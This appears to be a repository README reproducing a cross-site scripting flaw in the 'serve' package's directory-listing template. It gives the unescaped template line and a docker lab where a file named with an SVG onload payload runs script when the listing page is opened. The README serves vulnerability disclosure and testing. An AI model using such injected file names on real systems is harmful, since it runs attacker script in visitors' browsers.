Cross-Site Scripting @ serve package

Installation

docker-compose up --build

the problem is that the template which the module is using used file names without sanitizing

<a href="{{=value.relative}}" title="{{=value.title}}" class="{{=value.ext}}">{{=value.base}}</a>

so if a file is named "><svg onload=alert(1);> for example, an alert will popup once we open the page that lists files in the directory.

open the Browser and enter the following url http://localhost:4000/create-file?name=%22%3E%3Csvg%20onload%3Dalert%281%29%3B%3E this will create file with name "><svg onload=alert(1);>
open the Browser and enter the following url http://localhost:3000/ an alert will popup once we open the page that lists files in the directory that mean the attack passed successfully.

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
src		src
.dockerignore		.dockerignore
.gitignore		.gitignore
Dockerfile		Dockerfile
docker-compose.yml		docker-compose.yml
package-lock.json		package-lock.json
package.json		package.json
readme.md		readme.md